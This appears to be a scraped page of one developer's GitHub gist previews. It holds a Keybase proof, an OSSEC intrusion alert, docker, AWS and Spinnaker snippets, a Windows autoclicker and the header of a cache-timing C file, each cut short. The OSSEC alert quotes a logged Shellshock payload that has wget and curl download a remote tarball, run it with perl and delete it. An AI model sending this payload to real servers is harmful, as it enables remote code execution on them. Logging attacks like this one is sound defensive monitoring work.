I hereby claim:
- I am burdzwastaken on github.
- I am burdz (https://keybase.io/burdz) on keybase.
- I have a public key whose fingerprint is 3819 91A4 8A07 E659 9716 B2F5 AAAD 9B13 4D3A C027
To claim this, I am signing this object:
OSSEC HIDS Notification. | |
2016 Mar 20 09:38:57 | |
Received From: ip->/var/log/nginx/access.log | |
Rule: 31151 fired (level 10) -> "Multiple web server 400 error codes from same source ip." | |
Portion of the log(s): | |
119.188.4.3 - - [20/Mar/2016:09:38:55 +0000] "GET /gitweb/ HTTP/1.1" 404 151 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22wget http://IP/asd.tar -O /tmp/asd.tar;curl -O /tmp/asd.tar http://IP/asd.tar ; perl /tmp/asd.tar; rm -fr /tmp/asd.tar;rm -rf /tmp/asd.*\x22);'" |
I hereby claim:
To claim this, I am signing this object:
# requires docker && docker-compose | |
mkdir kolide-local && cd kolide-local | |
echo " | |
version: '2' | |
services: | |
mysql: | |
image: mysql:5.7 | |
volumes: |
import os | |
import sys | |
import boto3 | |
def getParameter(): | |
region = sys.argv[1] | |
param = sys.argv[2] | |
ssm = boto3.client('ssm', | |
region_name=region |
#include <Windows.h> | |
int main() | |
{ | |
for (;;) | |
if (GetAsyncKeyState(65)) | |
{ | |
mouse_event(2, 0, 0, 0, 1); | |
mouse_event(4, 0, 0, 0, 1); | |
Sleep(1); | |
} |
# using grep to restore accidentally deleted txt files from a disk | |
# create test file | |
echo -e '#!/bin/bash\necho this is a delete test' >> delete_test.sh | |
# make it executable && run for a test | |
chmod +x ./delete_test.sh && ./delete_test.sh | |
# delete the file | |
rm -f ./delete_test.sh |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <stdint.h> | |
#ifdef _MSC_VER | |
#include <intrin.h> /* for rdtscp and clflush */ | |
#pragma optimize("gt",on) | |
#else | |
#include <x86intrin.h> /* for rdtscp and clflush */ | |
#endif |
# Automated AMI and Snapshot Deletion | |
# | |
# @author Robert Kozora <bobby@kozora.me> | |
# | |
# This script will search for all instances having a tag with "Backup" or "backup" | |
# on it. As soon as we have the instances list, we loop through each instance | |
# and reference the AMIs of that instance. We check that the latest daily backup | |
# succeeded then we store every image that's reached its DeleteOn tag's date for | |
# deletion. We then loop through the AMIs, deregister them and remove all the | |
# snapshots associated with that AMI. |
--- | |
schema: "1" | |
id: bakeAndTagRoot | |
metadata: | |
name: Bake And Tag Pipeline | |
description: |- | |
Defines a pipeline that bakes and tags an AMI. This template cannot be used directly. | |
owner: devops@mulesoft.com | |
scopes: [global] | |
protect: false |
--- | |
schema: "1" | |
pipeline: | |
application: samplespinnakerpipeline | |
name: Bake samplespinnakerpipeline | |
template: | |
source: spinnaker://bakeAndTagRoot | |
variables: | |
jenkinsJob: "DevOps/job/mulesoft-ops/job/sample-spinnaker-app/job/master" | |
extendedAttributes: |